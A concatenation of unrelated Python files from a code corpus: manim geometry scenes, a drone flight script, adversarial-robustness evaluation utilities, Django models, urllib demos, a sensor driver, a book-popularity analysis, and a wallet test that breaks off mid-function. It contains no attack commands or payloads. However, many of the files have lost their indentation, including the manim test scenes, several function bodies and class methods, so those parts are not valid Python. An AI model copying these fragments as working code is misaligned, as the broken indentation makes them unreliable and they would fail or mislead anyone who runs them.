        t = np.linspace(0, 2 * np.pi, num)
        for i in range(len(t)):
            for j in range(len(arc_list)):
                # i-th sample point on circle j
                p = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r_list[j] + o_list[j]
                p_in = True
                # keep the point only if it is inside every circle
                for k in range(len(arc_list)):
                    p_in = p_in and p_in_circle(p, o_list[k], r_list[k])
                if p_in:
                    arc_list[j].append(p)
        vertices = []
        for arc in arc_list:
            vertices += arc
        VMobject.__init__(self, **kwargs)
        n_v = len(vertices)
        v_arr = np.array(vertices)
        # centroid of the surviving boundary points
        center = sum(v_arr)/n_v
        angle = []
        def get_angle(vector):
            # polar angle of `vector` in [0, 2*pi)
            if vector[1] >= 0:
                return np.arccos(vector[0]/np.sqrt(sum(vector ** 2)))
            else:
                return 2 * np.pi - np.arccos(vector[0]/np.sqrt(sum(vector ** 2)))
        for v in vertices:
            angle_i = get_angle(v - center)
            angle.append(angle_i)
        # order vertices counter-clockwise around the centroid
        order = np.argsort(np.array(angle))
        vertices_in_order = list(np.zeros((n_v, 3)))
        for i in range(n_v):
            vertices_in_order[i] = vertices[order[i]]
        self.set_points_as_corners(
            [*vertices_in_order, vertices_in_order[0]]
        )
## some tests ##
class Test_2cirlces(Scene):
def construct(self):
circle_1 = Circle().scale(2).shift(LEFT * 1.5)
circle_2 = Circle().scale(1.5).shift(RIGHT * 1 + DOWN * 1.2)
intersection = Intersection_2circle(circle_1, circle_2, color=YELLOW, fill_color=YELLOW)
self.play(ShowCreation(circle_1))
self.play(ShowCreation(circle_2))
self.wait()
self.play(ShowCreation(intersection), run_time=2)
self.wait(0.5)
self.play(ApplyMethod(intersection.set_opacity, 0.8))
self.wait(2)
self.play(FadeOut(intersection))
self.wait(0.5)
circle_3 = Circle().scale(1.8).shift(UP * 1. + LEFT * 0.4)
intersection_3c = Intersection_n_circle(circle_1, circle_2, circle_3, color=YELLOW, fill_color=YELLOW)
self.play(ShowCreation(circle_3))
self.wait()
self.play(ShowCreation(intersection_3c), run_time=2)
self.wait()
self.play(ApplyMethod(intersection_3c.set_opacity, 1))
self.wait(4)
class N_circles(Scene):
def construct(self):
circles = VGroup()
circles.add(Circle(radius=2).shift(LEFT * 2))
circles.add(Circle(radius=1.5).shift(LEFT * 1))
circles.add(Circle(radius=2).shift(UP * 1.8 + RIGHT * 0.5))
circles.add(Circle(radius=3).shift(RIGHT * 2 + DOWN * 0.5))
circles.add(Circle(radius=2).shift(DOWN * 1))
circles.add(Circle(radius=2.4).shift(LEFT * 1.2 + UP * 2.4))
for i in range(len(circles)):
self.play(ShowCreation(circles[i]), run_time=1)
self.wait(0.5)
intersection = Intersection_n_circle(*circles, color=YELLOW)
self.wait(0.5)
self.play(ShowCreation(intersection), run_time=2)
self.wait()
self.play(ApplyMethod(intersection.set_opacity, 0.8))
self.wait(4)
class Four_circles(Scene):
def construct(self):
circle_1 = Circle(radius=2).shift(UP + LEFT)
circle_2 = Circle(radius=2).shift(-UP + LEFT)
circle_3 = Circle(radius=2).shift(UP - LEFT)
circle_4 = Circle(radius=2).shift(-UP - LEFT)
intersection_1234 = Intersection_n_circle(circle_1, circle_2, circle_3, circle_4,
color=YELLOW, fill_opacity=0.6, fill_color=YELLOW)
intersection_14 = Intersection_n_circle(circle_1, circle_4, color=YELLOW, fill_opacity=0.6, fill_color=YELLOW)
self.add(circle_1, circle_2, circle_3, circle_4)
self.wait()
self.play(ShowCreation(intersection_14))
self.wait()
self.play(ReplacementTransform(intersection_14, intersection_1234))
self.wait(2)
|
15,944 | f2373b372abad41cc6a9bf4237c692bb7fe155bd | # -*- coding: UTF-8 -*-
import olympe
from olympe.messages.ardrone3.Piloting import TakeOff, moveBy, Landing, NavigateHome, moveTo
import olympe_deps as od
from olympe.messages.ardrone3.PilotingState import FlyingStateChanged
from olympe.messages.camera import take_photo, set_camera_mode, set_photo_mode, photo_progress
from olympe.messages.gimbal import set_target
from olympe.messages.ardrone3.GPSSettings import SetHome
from PIL import Image
import math
import sys
import requests
homeLatitude = 48.87890000000001
homeLongitude = 2.3677799999999998
homeAltitude = 3.0
entranceLatitude = 48.879031563239856
entranceLongitude = 2.367685713676506
entranceAltitude = 0.9825900793075562
# Drone IP
ANAFI_IP = "10.202.0.1"
drone = olympe.Drone(ANAFI_IP)
# Get argument
destination = sys.argv[1]
def goToEntrance():
    """Climb, fly to the entrance GPS fix, then descend to entrance altitude.

    NOTE(review): moveBy's third argument -5 presumably means "climb 5 m"
    (NED z-axis convention) — confirm against the Olympe docs.
    """
    print("Going to entrance")
    # climb 5 m first to clear obstacles
    drone(
        moveBy(0, 0, -5, 0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    # fly to the entrance position at a safe 5 m altitude...
    drone(
        moveTo(latitude=entranceLatitude, longitude=entranceLongitude,altitude=5, orientation_mode=0, heading=0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    # ...then descend to the entrance altitude
    drone(
        moveTo(latitude=entranceLatitude, longitude=entranceLongitude,altitude=entranceAltitude, orientation_mode=0, heading=0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    return
def goToHome():
    """Climb 5 m, then fly back to the home GPS fix at home altitude."""
    print("Going to HOME")
    # climb first to clear obstacles before the return leg
    drone(
        moveBy(0, 0, -5, 0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    drone(
        moveTo(latitude=homeLatitude, longitude=homeLongitude,altitude=homeAltitude, orientation_mode=0, heading=0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    return
def goToDestination(destination):
    """Fly to a parking spot named like 'A3' or 'B5', then return home.

    The original had twelve copy-pasted branches; they differed only in the
    lateral offset (spot digit) and the sign of the final forward move
    (row letter), so the flight plan is table-driven here. Unknown
    destinations are ignored, exactly as the original if/elif chain did.
    """
    # lateral (y) offset in metres for spot numbers 1..6 (spot 1 = no move)
    lateral_offsets = {"1": 0, "2": 2.3, "3": 4.8, "4": 7.1, "5": 9.5, "6": 12}
    # forward (x) move in metres for each row: A is +x, B is -x
    row_moves = {"A": 4.93, "B": -4.93}
    if len(destination) != 2:
        return
    row, spot = destination[0], destination[1]
    if row not in row_moves or spot not in lateral_offsets:
        return
    goToEntrance()
    lateral = lateral_offsets[spot]
    if lateral:
        drone(
            moveBy(0, lateral, 0, 0)
            >> FlyingStateChanged(state="hovering", _timeout=5)
        ).wait()
    drone(
        moveBy(row_moves[row], 0, 0, 0)
        >> FlyingStateChanged(state="hovering", _timeout=5)
    ).wait()
    goToHome()
    return
print("Destination: " + destination)
drone.connection()
drone(
TakeOff()
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToDestination(destination)
drone(Landing()).wait()
drone.disconnection()
|
15,945 | ce8b50c49b67596f39e3e2ebf1e97ff86b1d0911 | from foolbox.distances import LpDistance
import numpy as np
import eagerpy as ep
from math import ceil
import pandas as pd
from attack.criteria import TargetedMisclassification
import torch
# Here defines the maximum allowed batch size:
MAX_BATCH = 128
def collect_attack_search_statistics(trials):
    """Count how many trials used each attack class.

    Each trial is a tuple whose first element is a dict containing an
    'attack' object; the count is keyed by that object's type.
    """
    counts = {}
    for trial in trials:
        attack_cls = type(trial[0]['attack'])
        counts[attack_cls] = counts.get(attack_cls, 0) + 1
    return counts
def collect_scores(trials):
    """Group trial scores (trial[2]) by the attack class of trial[0]['attack']."""
    scores_by_type = {}
    for trial in trials:
        attack_cls = type(trial[0]['attack'])
        scores_by_type.setdefault(attack_cls, []).append(trial[2])
    return scores_by_type
def collect_scores_df(trials):
    """Return a DataFrame with one row per trial: attack name and score."""
    records = [(type(trial[0]['attack']).name(), trial[2]) for trial in trials]
    names = [rec[0] for rec in records]
    scores = [rec[1] for rec in records]
    return pd.DataFrame({"attack": names, "score": scores})
def collect_param_scores_df(trials):
    """Return a DataFrame of (attack name, score, remaining hyper-params).

    BUG FIX: the original did `trial[0].pop('attack')`, mutating the
    caller's trial data as a side effect — calling this twice on the same
    trials raised KeyError. The param dict is now built without mutating
    the input.
    """
    attack_list = []
    score_list = []
    param_list = []
    for trial in trials:
        params = trial[0]
        att_type = type(params['attack'])
        attack_list.append(att_type.name())
        score_list.append(trial[2])
        # copy everything except the attack object itself
        param_list.append({k: v for k, v in params.items() if k != 'attack'})
    return pd.DataFrame({"attack": attack_list, "score": score_list, 'param': param_list})
def get_progression(trials):
    """Return (per-trial scores, running best-so-far scores).

    BUG FIX: the running maximum was seeded with -100, so any trial score
    below -100 was misreported as -100 in the progression; seed with -inf
    instead.
    """
    individual_list = []
    progress_list = []
    curr_max = float('-inf')
    for trial in trials:
        individual_list.append(trial[2])
        curr_max = max(curr_max, trial[2])
        progress_list.append(curr_max)
    return individual_list, progress_list
def misclassification_criterion(instance, adv_imgs, labels, detector=False):
    """
    Misclassification Criterion function

    Returns a bool tensor marking samples that are misclassified AND pass
    the detector. If detector=True, also returns the raw detector output.
    NOTE(review): assumes instance.predict returns (logits, detector_bool)
    — confirm against the model wrapper.
    """
    adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
    robust_acc_bool = torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device))
    # adversarial = wrong top-1 prediction that the detector still accepts
    is_adv_det_bool = ~robust_acc_bool & adv_det
    if detector:
        return is_adv_det_bool, adv_det
    else:
        return is_adv_det_bool
def misclassification_criterion_acc_check(instance, adv_imgs, labels, imgs):
"""
This method is for detectors to remove false-negative samples
if no detector, it is the same as misclassification_criterion
Check if the adv_imgs are misclassified adversarial
"""
pred, det = instance.predict(imgs)
acc_bool = torch.argmax(pred, dim=1).eq(labels.to(instance.device))
acc_det_bool = acc_bool & det
return ~acc_det_bool | misclassification_criterion(instance, adv_imgs, labels)
def misclassification_criterion_rerr(instance, adv_imgs, labels, imgs):
"""
This method is for detectors to remove false-negative samples
if no detector, it is the same as misclassification_criterion
Check if the adv_imgs are misclassified adversarial
"""
pred, det = instance.predict(imgs)
acc_err_bool = ~torch.argmax(pred, dim=1).eq(labels.to(instance.device)) & det
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
mask = det | adv_det
err = acc_err_bool | robust_err_bool
return err, mask
def get_acc_robust_disturbance(instance, imgs, adv_imgs, labels, norm=ep.inf, verbose=False):
"""
Return a list: [accuracy, rerr, disturbance, robustness, loss]
"""
adv_imgs = adv_imgs.clone()
# deal with nan in the image.
if (torch.isnan(adv_imgs).any()):
print("There is nan is the adversarial image, will fill nan pixels with the original img")
mask = torch.isnan(adv_imgs)
adv_imgs[mask] = 0
adv_imgs = mask*imgs + adv_imgs
assert(not torch.isnan(adv_imgs).any())
pred, det = instance.predict(imgs)
pred2, det = instance.predict(imgs)
is_random = not pred.eq(pred2).all()
acc_bool = torch.argmax(pred, dim=1).eq(labels.to(instance.device))
det_bool = acc_bool & det
acc_err_bool = ~torch.argmax(pred, dim=1).eq(labels.to(instance.device)) & det
raw_accuracy = float(torch.sum(acc_bool.to(torch.float32)) / len(labels))
det_accuracy = float(torch.sum(det_bool.to(torch.float32)) / len(labels))
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
predsoft = adv_pred.softmax(dim=1)
ce_loss = -(predsoft[np.arange(labels.shape[0]), labels]+0.001).log() # 0.001 to avoid extreme values
if not is_random:
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
mask = det | adv_det
err_bool = acc_err_bool | robust_err_bool
num_adv = float(torch.sum(err_bool.to(torch.float32)))
else:
num_adv = 0
mask = det | adv_det
for _ in range(10):
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
err_bool = acc_err_bool | robust_err_bool
num_adv += float(torch.sum(err_bool.to(torch.float32)))/10
remain_list = []
for i in range(len(labels)):
if det_bool[i]:
remain_list.append(i)
adv_imgs_r = adv_imgs[remain_list, :]
imgs_r = imgs[remain_list, :]
rerr = num_adv / float(torch.sum(mask))
det_attack_accuracy = num_adv / len(labels)
network_robustness = 1 - rerr
ce_loss = float(torch.mean(ce_loss))
assert(len(adv_imgs_r) == len(imgs_r))
disturbance = get_disturbance(imgs_r, adv_imgs_r, norm)
if verbose:
print("Raw accuracy is: {:.2f}%".format(raw_accuracy*100))
print("Detector accuracy is: {:.2f}%".format(det_accuracy*100))
print("Robustness error rate is: {:.2f}%".format(rerr*100))
print("Detector attack success rate is: {:.2f}%".format(det_attack_accuracy*100))
print("Robustness of the network is: {:.2f}%".format(network_robustness*100))
print("The average {:.1f} norm disturbance is: {:.4f}".format(norm, disturbance))
print("Untargeted CE loss is {:.3f}".format(ce_loss))
result = [det_accuracy*100, rerr*100, disturbance, network_robustness*100, ce_loss]
return result
def get_disturbance(x, y, norm):
linf = LpDistance(norm)
batch_eps = linf(x, y)
return float(torch.mean(batch_eps))
def print_eval_result(evals):
print("The accuracy of the network is {:.3f}%".format(evals[0]))
print("The robustness of the network is {:.3f}%".format(evals[1]))
print("The ASR of the attack is {:.3f}%".format(evals[2]))
print("Attack time used is {:.3f}s".format(evals[3]))
print("Total time used is {:.3f}s".format(evals[4]))
print()
def batch_is_adv(model, adv_imgs, labels):
pred = batch_forward(model, adv_imgs)
if isinstance(labels, TargetedMisclassification):
is_adv = torch.argmax(pred, dim=1).eq(labels.target_classes.raw)
else:
is_adv = torch.argmax(pred, dim=1).ne(labels)
return is_adv
def batch_forward(model, images, max_batch=MAX_BATCH):
"""
Batched version of the forward function
"""
N = images.shape[0]
nbatchs = ceil(N / max_batch)
pred_list = []
with torch.no_grad():
for i in range(nbatchs):
pred_list.append(model(images[i * max_batch: (i + 1) * max_batch]))
return torch.cat(pred_list, dim=0)
|
15,946 | 54332ff9eed2cd36b601ce0409faf64be849f64f | """ User serializers """
# Django REST Framework
from rest_framework import serializers
# Models
from valoracion.users.models import User
class UserModelSerializer(serializers.ModelSerializer):
""" User model serializer """
email = serializers.EmailField(required=True)
username = serializers.CharField()
first_name = serializers.CharField()
last_name = serializers.CharField()
phone_number = serializers.CharField(max_length=17)
class Meta:
""" Meta Class """
model = User
fields = (
'id', 'email', 'username', 'first_name', 'last_name', 'phone_number'
) |
15,947 | cb2705b1f286b1998f9e87625e989769c51f473a | from urllib.parse import urlparse, urlunparse, urlsplit, urlunsplit, urljoin, urlencode, parse_qs, parse_qsl, quote, \
unquote
"""1. urlparse()"""
# urllib.parse.urlparse(urlstring, scheme='', allow_fragments=True)
# scheme://netloc/path;params?query#fragment
# scheme only works when no scheme specified in URL
# allow_fragments set to False causes it parsed as part of path/para/query
result = urlparse('https://www.baidu.com/index.html;user?id=5#comment')
print(type(result), result)
"""2. urlunparse()"""
# construct url
# argument length must be 6
data = ['http', 'www.baidu.com', 'index.html', 'user', 'a=6', 'comment']
print(urlunparse(data))
"""3. urlsplit()"""
# return tuple/SplitResult object
result = urlsplit('http://www.baidu.com/index.html;user?id=5#comment')
print(result, result.scheme, result[0], sep='\n')
"""4. urlunsplit()"""
# construct url
# argument length must be 5
data = ['http', 'www.baidu.com', 'index.html', 'a=6', 'comment']
print(urlunsplit(data))
"""5. urljoin()"""
# construct url using base_url and target_url
# base_url only provides: scheme, netloc, path as reference
print(urljoin('http://www.baidu.com', 'FAQ.html'))
print(urljoin('http://www.baidu.com/about.html', 'https://sb.com/FAQ.html'))
print(urljoin('http://www.baidu.com?wd=abc', 'https://sb.com/FAQ.html?question=2'))
print(urljoin('http://www.baidu.com', '?category=2#comment'))
print(urljoin('http://www.baidu.com#comment', '?category=2'))
"""6. urlencode()"""
# construct request args of GET method
params = {
'name': 'germey',
'age': 22
}
base_url = 'http://www.baidu.com?'
url = base_url + urlencode(params)
print(url)
"""7. parse_qs()"""
# deserialization
query = 'name=germey&age=22'
print(parse_qs(query))
"""8. parse_qsl()"""
# convert to tuple list
query = 'name=germey&age=22'
print(parse_qsl(query))
"""9. quote()"""
# convert content to URL encoded format
keyword = '壁纸'
url = 'https://www.baidu.com/s?wd=' + quote(keyword)
print(url)
"""10. unquote()"""
# decode URL
url = "https://www.baidu.com/s?wd=%E5%A3%81%E7%BA%B8"
print(unquote(url))
|
15,948 | 5f649a8733879ea04830ee1024492d6848b66abc | from django.db import models
from django.conf import settings
import uuid
from django.contrib.auth.models import User
from django.utils.timezone import now
# Create your models here.
class RegistrationToken(models.Model):
    """One-time registration token bound to a user."""
    token = models.UUIDField(default=uuid.uuid4)
    # BUG FIX: was auto_now=True, which rewrites the timestamp on EVERY
    # save() and so silently extends the token's lifetime; auto_now_add
    # sets it once at creation (matching Order.created_at in this module).
    # NOTE: requires a migration.
    created_at = models.DateTimeField(auto_now_add=True)
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    # error type raised when the token's validity period has elapsed
    class Expired(Exception): pass
    def is_expired(self):
        """Return True if the token is older than settings.TOKEN_EXPIRATION_HOURS."""
        delta = now() - self.created_at
        delta_hours = delta.total_seconds() / 3600
        return delta_hours > settings.TOKEN_EXPIRATION_HOURS
    def __str__(self):
        return "%s" % self.token
class SoftDeleteManager(models.Manager):
def active(self):
return self.filter(is_deleted=False)
def deleted(self):
return self.filter(is_deleted=True)
class Product(models.Model):
name = models.CharField(max_length=255)
description = models.TextField(max_length=2000, null=True, blank=True)
arrival_date = models.DateTimeField(verbose_name="Время создания")
is_deleted = models.BooleanField(default=False)
categories = models.ManyToManyField('Category', related_name="product", blank=True, verbose_name="Категория")
price = models.DecimalField(max_digits=10, decimal_places=2)
objects = SoftDeleteManager()
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=255, verbose_name="Категория")
description = models.TextField(max_length=2000, null=True, blank=True, verbose_name="Описание")
def __str__(self):
return self.name
class Product_photo(models.Model):
product = models.ForeignKey(Product, related_name="images", verbose_name="Фото продукта", on_delete=models.PROTECT)
images = models.ImageField(upload_to='images', null=True, blank=True)
class Order(models.Model):
user = models.ForeignKey(User, related_name="order", verbose_name="Пользователь", on_delete=models.PROTECT)
products = models.ManyToManyField('Product', related_name="order", verbose_name="Продукты")
phone = models.CharField(max_length=255, verbose_name="Телефон")
address = models.CharField(max_length=255, verbose_name="Адрес", null=True, blank=True)
comment = models.TextField(max_length=2000, null=True, blank=True, verbose_name="Комментарий")
created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время создания')
|
15,949 | 6716acabb6389ff4dd37a50cf0afbf67422a6298 | import json
from pprint import pprint
from string import Template
from presentation import generate_template
def calculateLikesFrom(likesDict, username):
    """Return how many likes `username` gave, or 0 if absent.

    Replaces the manual linear scan (which used Python-2-only iteritems)
    with a direct dict lookup.
    """
    return likesDict.get(username, 0)
def extractFirstName(s):
    """Return the text before the first '*', with any directory prefix stripped."""
    before_star = s.split('*')[0]
    return str(before_star.split('/')[-1])
def extractSecondName(s):
    """Return the third '*'-separated field, without its file extension."""
    third_field = s.split('*')[2]
    return str(third_field.split('.')[0])
###############################################################
def convertJsonToLikesTable(jsonPath, likesTablePath):
with open(jsonPath) as data_file:
data = json.load(data_file)
username = data['username']
print "Convert json data for " + username + "..."
userLikes = {}
photos = data['photos']
for photo in photos:
likes = photo['likes']
for like in likes:
like_by = str(like['username'])
if like_by in userLikes:
userLikes[like_by] += 1
else:
userLikes[like_by] = 1
oo = open(likesTablePath, "w")
for user, likeCount in userLikes.iteritems():
oo.write(str(user) + ',' + str(likeCount) + '\n')
oo.close()
def calculateMutualLikes(whoLikes, whomLikes, output):
whoLikesFile = open(whoLikes)
whomLikesFile = open(whomLikes)
outputFile = open(output, "w")
likes_dict = {}
for line in whomLikesFile:
(user, like_count) = line.split(",")
likes_dict[user] = int(like_count)
username = whoLikesFile.name.split('.')[0]
likes = calculateLikesFrom(likes_dict, username)
outputFile.write(str(likes))
whoLikesFile.close()
whomLikesFile.close()
outputFile.close()
def calcStatistics(likesCountFiles, output):
usersSet = set()
for f in likesCountFiles:
usersSet.add(extractFirstName(f))
usersList = list(usersSet)
peoples_count = len(usersList)
userMapping = {}
for i in xrange(peoples_count):
userMapping[usersList[i]] = i
data = [[0 for i in xrange(peoples_count)] for j in xrange(peoples_count)]
for f in likesCountFiles:
ii = open(f)
likes = int(ii.read())
ii.close()
whoLikes = extractFirstName(f)
whomLikes = extractSecondName(f)
data[userMapping[whoLikes]][userMapping[whomLikes]] = likes
generate_template(data, usersList, output) |
15,950 | 10b72df1eff861e6eb3a6ce446adda231d054d9c | from machine import Pin
from onewire import OneWire
from ds18x20 import DS18X20
from time import sleep
class tempSensorDS:
    """DS18x20 temperature sensor on a OneWire bus (MicroPython)."""
    def __init__(self, pin_nb):
        # pin_nb: GPIO number the sensor's data line is wired to
        self.pin = Pin(pin_nb, Pin.IN)
        self.ow = DS18X20(OneWire(self.pin))
        # ROM address of the first sensor found on the bus
        self.ds_sensor = self.scan()
    def scan(self):
        """Return the address of the first DS sensor found; exit the program if none."""
        try:
            return self.ow.scan()[0]
        except IndexError:
            print('ERR: No DS sensors found.')
            exit(0)
    def measure_temp(self, delay=0.75):
        """Trigger a conversion, wait `delay` seconds, and return the temperature.

        NOTE(review): 0.75 s presumably matches the DS18B20 12-bit conversion
        time (>=750 ms) — confirm against the datasheet.
        """
        self.ow.convert_temp()
        sleep(delay)
        return self.ow.read_temp(self.ds_sensor)
15,951 | 8c0e722951de6173e3aa1d5f3401153b41050b63 | def artifact_removal(self, csp, info, layout):
print("This CLI will help you remove features that look like artifacts.")
print("Please enter an integer number (starting from 0) for each of the patterns you would like to drop.")
print("Once you are done, enter a negative integer")
drops = []
while 1:
csp.plot_patterns(info, layout=layout)
print("Please select which features to drop [band/component]: ")
drop = int(input())
if drop < 0:
return drops
else:
drops.append(drop) |
15,952 | b8c632ef4b69bc0a15142fc8057c607e1751e58c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 8 15:03:25 2021
@author: Moritz
"""
# for every itemID, a popularity score is calculated based on clicks, basket, and orders
# Additonally, the main topic and popularity rank for the main topic is added as an item attribute.
# Look at data frame "df" for the popularity score, and the matrix "mat" for the co-occurences.
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
path = "/media/Moritz/080FFDFF509A959E/BWsync_share/Master_BW/Data Mining Cup/code_and_data/"
items = pd.read_csv(path + "items.csv", sep = "|")
T = pd.read_csv(path + "transactions.csv", sep = "|")
#%%
#df = pd.DataFrame(columns = ["itemID", "clicks", "basket", "orders", "pop", "main topic", "rank_main_topic"])
tid = np.sort(T["itemID"].unique())
def length(x):
    """Return len(x) for strings, None for any other value (e.g. NaN).

    Uses isinstance rather than the original `type(x) == str` comparison,
    which is the idiomatic type check and also accepts str subclasses.
    """
    if isinstance(x, str):
        return len(x)
    else:
        return None
def cut_main_topic(x):
    """Truncate a main-topic code to at most 4 characters.

    Most books have a main topic of 2-4 characters, so chars beyond the 4th
    are ignored. Values without len() (NaN, None) yield None.

    BUG FIX: the original bare `except: pass` swallowed every error and fell
    through to an implicit None; catch only the expected TypeError and
    return None explicitly.
    """
    try:
        if len(x) > 4:
            return x[0:4]
        else:
            return x
    except TypeError:
        return None
df = items.loc[items["itemID"].isin(tid)]
df = df[["itemID", "main topic"]]
df["main topic"] = items.loc[items["itemID"].isin(tid)]["main topic"].apply(lambda x: cut_main_topic(x))
#%%
# simple way, summing up all orders, basket addition and clicks
#df = df.merge(T.groupby("itemID").sum()[["click","basket","order"]],
# left_on = "itemID", right_on = "itemID", how = "inner")
# more realistic: In one session, only count the "most important" action: order > basket > click
def metric(x):
    """Keep only the most important action per session: order > basket > click.

    x is an indexable triple (clicks, baskets, orders); the two less
    important counters are zeroed out.
    """
    clicks, baskets, orders = x[0], x[1], x[2]
    if orders > 0:
        return [0, 0, orders]
    if baskets > 0:
        return [0, baskets, 0]
    return [clicks, 0, 0]
T_grouped = T.groupby(["itemID","sessionID"]).sum()
m = T_grouped.apply(lambda x: metric(x), axis = 1).values
click = np.zeros((len(T),))
basket = np.zeros((len(T),))
order = np.zeros((len(T),))
for i in range(len(T)):
click[i], basket[i], order[i] = m[i]
T_grouped["click"] = click
T_grouped["basket"] = basket
T_grouped["order"] = order
df = df.merge(T_grouped.groupby("itemID").sum(), left_on = "itemID", right_on = "itemID", how = "inner")
#%% popularity score
def pop(x, a, b, c):
    """Weighted popularity score of x = (clicks, baskets, orders) with weights a, b, c."""
    weights = (a, b, c)
    return sum(w * v for w, v in zip(weights, x))
a = 1
b = 5 # maybe higher? almost like bought..
c = 10
df["pop"] = df[["click", "basket", "order"]].apply(lambda x: pop(x, a, b, c), axis = 1)
def rank_by_topic(x, df):
    """1-based popularity rank of x = (main topic, pop score) within its topic."""
    topic, score = x[0], x[1]
    same_topic = df.loc[df["main topic"] == topic]
    return int((same_topic["pop"] > score).sum()) + 1
df["rank_main_topic"] = df[["main topic", "pop"]].apply(lambda x: rank_by_topic(x,df), axis = 1)
df_all_books = items[["itemID"]]
df_all_books = df_all_books.merge(df[["itemID","pop","rank_main_topic"]], how = "left", on = "itemID")
df_all_books.to_csv("/media/Moritz/080FFDFF509A959E/BWsync_share/Master_BW/Data Mining Cup/code_and_data/items_popularity.csv", sep = "|")
#%%
# most popular books:
print("Most popular books:")
print("")
best = df.sort_values(by = "pop", ascending = False)["itemID"].head()
print(items.loc[items["itemID"].isin(best)]["title"])
# most popular books in the categories ...
best = df.loc[df["main topic"] == "FM"].sort_values(by = "pop", ascending = False)[["itemID", "pop", "order", "basket", "click"]].head()
best = best.merge(items.loc[items["itemID"].isin(best["itemID"])][["itemID","title"]], on = "itemID")
#%% co-occurence matrix
mat = np.zeros((len(tid), len(tid)), dtype = "int64")
T.groupby("sessionID").count()
for sid in T["sessionID"].unique():
data = T[T["sessionID"] == sid]
if len(data) > 1:
for k in range(len(data)):
for l in range(len(data)):
mat[np.where(tid == data.iloc[k]["itemID"])[0][0]][np.where(tid == data.iloc[l]["itemID"])[0][0]] += 1
for i in range(len(tid)):
mat[i][i] = 0
#%% illustration of co-occurence matrix
np.where(mat == np.max(mat))
a = items[items["itemID"] == tid[725]]
b = items[items["itemID"] == tid[14744]]
n_occ = np.sum(mat, axis = 1)/2
np.max(n_occ)
plt.boxplot(n_occ)
sum(n_occ > 0) #14471 books co-occur with at least once with other book
#TODO! Why are there odd rowsums?
#sum(mat[1])
#sids = T[T["itemID"] == 30277]["sessionID"].values
#T[T["sessionID"].isin(sids)]
# indexes for itemID 30277:
#sum((mat[np.where(tid == 30277)] > 0)[0])
|
15,953 | d73c77e327197260d1316f2ba06f33386c485b96 | from django.shortcuts import render
from django.shortcuts import get_object_or_404
from rest_framework import status, response, views
from foundations.models import Sensor
from sensor.serializers import SensorRetrieveSerializer
def sensor_retrieve_page(request, id):
    """Render the HTML detail page for the sensor identified by ``id``."""
    context = {'id': id}
    return render(request, "sensor/retrieve.html", context)
class SensorRetrieveAPI(views.APIView):
    """Read-only API endpoint returning a single serialized Sensor."""

    def get(self, request, id):
        """Return the sensor with the given id as JSON; 404 if it does not exist."""
        # int(id) will raise ValueError for non-numeric ids before the lookup runs.
        sensor = get_object_or_404(Sensor, id=int(id))
        serializer = SensorRetrieveSerializer(sensor)
        return response.Response(
            status=status.HTTP_200_OK,
            data=serializer.data
        )
|
15,954 | 6d8814e4dbd4926e5989c89d44a0bd12839bd100 | ### 8/20/2020
### Using arbitrary keyword arguments
def seat_profile(first_name, last_name, **passenger_info):
    """Build a dictionary containing all passenger information.

    Args:
        first_name: passenger's first name.
        last_name: passenger's last name.
        **passenger_info: any additional attributes (e.g. seat_number).

    Returns:
        dict with 'first_name', 'last_name' and all extra keyword pairs.
    """
    # BUG FIX: the original referenced undefined names `first`/`last`,
    # raising NameError; use the actual parameter names.
    profile = {'first_name': first_name, 'last_name': last_name}
    for key, value in passenger_info.items():
        profile[key] = value
    return profile
# BUG FIX: the original passed the expression `'breakfast_ordered:' == "yes"`
# (which evaluates to False) as a third *positional* argument, raising
# TypeError since seat_profile only accepts two positionals. The intent was
# clearly a keyword argument.
passenger_profile = seat_profile('v', 'kim', breakfast_ordered='yes', seat_number=35)
print(passenger_profile)
|
15,955 | e531793fa19d52a5164166677384f10273ce3b82 | import shutil
import tempfile
import os
import json
from typing import Optional
import asyncio
import electrum_mona
from electrum_mona.wallet_db import WalletDB
from electrum_mona.wallet import Wallet
from electrum_mona import constants
from electrum_mona import util
from .test_wallet import WalletTestCase
# TODO add other wallet types: 2fa, xpub-only
# TODO hw wallet with client version 2.6.x (single-, and multiacc)
class TestStorageUpgrade(WalletTestCase):
def setUp(self):
super().setUp()
self.asyncio_loop, self._stop_loop, self._loop_thread = util.create_and_start_event_loop()
def tearDown(self):
super().tearDown()
self.asyncio_loop.call_soon_threadsafe(self._stop_loop.set_result, 1)
self._loop_thread.join(timeout=1)
def testnet_wallet(func):
# note: it's ok to modify global network constants in subclasses of SequentialTestCase
def wrapper(self, *args, **kwargs):
constants.set_testnet()
try:
return func(self, *args, **kwargs)
finally:
constants.set_mainnet()
return wrapper
##########
def test_upgrade_from_client_2_9_3_seeded(self):
